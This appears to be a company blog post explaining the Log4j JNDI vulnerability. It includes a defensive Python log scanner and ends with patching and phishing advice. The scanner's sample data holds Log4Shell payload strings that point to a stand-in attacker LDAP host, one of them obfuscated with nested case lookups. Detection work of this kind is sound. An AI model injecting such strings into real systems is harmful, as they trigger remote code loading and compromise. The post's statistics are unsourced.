Log4j Alert: Biggest Software Vulnerability of all time!!!
Attempted exploits of vulnerabilities in the Log4j logging library have been observed on more than 48% of corporate networks worldwide. 1.3 million hacking attempts have been reported so far!
What’s the Issue?
Log4j is an open-source logging library used by many developers to keep track of their online services or software applications.
On the 9th of December, a newly discovered bug in Log4j sent ripples through the cybersecurity community. Jen Easterly, Director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), said of the vulnerability:
“The log4j vulnerability is the most serious vulnerability I have seen in my decades-long career.”
Log4j allows logged messages to contain lookup strings that fetch external data through the Java Naming and Directory Interface (JNDI). The referenced information can be retrieved remotely over multiple protocols, including LDAP.
Because the content of logged messages often includes user-controlled data, an attacker can insert a JNDI reference pointing to an attacker-controlled LDAP server. That server can then serve malicious Java classes to the vulnerable application, carrying out whatever action the attacker intends.
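The mechanism above gives defenders something concrete to look for: a JNDI lookup string in user-supplied data that is about to be logged. The following is an added example, not code from the original post, showing a small scanner for request logs. Matching the literal text is not enough, because Log4j resolves nested case-changing lookups (the `${lower:...}` and `${upper:...}` forms) before the outer lookup, so the scanner resolves those first and then matches the resulting `${jndi:<scheme>:` prefix. The log lines, hostnames and addresses are constructed for the example.

```python
import re

# Constructed sample log lines (not from the original post): two benign
# requests, one plain JNDI lookup and one written with nested case lookups.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '203.0.113.6 - - "GET /search?q=${date:yyyy}" 200 "curl/7.79"',
    '198.51.100.7 - - "GET /" 200 "${jndi:ldap://attacker.example/a}"',
    '198.51.100.8 - - "GET /" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
]

# ${lower:x} / ${upper:x} resolve to their argument when Log4j evaluates
# the message, so the scanner resolves them before looking for JNDI.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)

# After normalisation a JNDI lookup has the shape ${jndi:<scheme>:...}.
_JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _resolve_case(match: "re.Match") -> str:
    """Apply a single lower/upper lookup to its argument."""
    keyword, argument = match.group(1).lower(), match.group(2)
    return argument.lower() if keyword == "lower" else argument.upper()


def normalize(text: str) -> str:
    """Resolve nested ${lower:..}/${upper:..} tokens until none remain."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(_resolve_case, text)
    return text


def find_jndi_lookups(line: str) -> list:
    """Return the lookup schemes (e.g. 'ldap') found in one log line."""
    return [m.group(1).lower() for m in _JNDI_LOOKUP.finditer(normalize(line))]


def scan(lines) -> list:
    """Return (line_index, schemes) for every line that carries a JNDI lookup."""
    hits = []
    for index, line in enumerate(lines):
        schemes = find_jndi_lookups(line)
        if schemes:
            hits.append((index, schemes))
    return hits


if __name__ == "__main__":
    for index, schemes in scan(SAMPLE_LOG_LINES):
        print(f"line {index}: JNDI lookup via {', '.join(schemes)}")
        print(f"  {SAMPLE_LOG_LINES[index]}")
```

Run over real access or application logs, this flags lines worth triaging; the benign `${date:yyyy}` lookup on line 1 is left alone because only the `jndi` lookup reaches out to a remote server.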
How to Prevent It?
Cybersecurity experts are working hard to mitigate and eradicate the bug, and security patches are being released regularly in the meantime. End customers are encouraged to switch immediately to the latest versions of their applications, which are typically built with the Log4j fix applied.
Any phishing email— from a non-authoritative or unexpected source, or arriving at an unexpected time— should not be clicked on or responded to in any way. Links and downloads in such emails must be avoided.
We are ensuring a safe and seamless experience for our customers. In case of any complications, feel free to contact the Claudion team.
Ethisham is a technical blogger and regular contributor for Claudion, ERPGulf and related publications.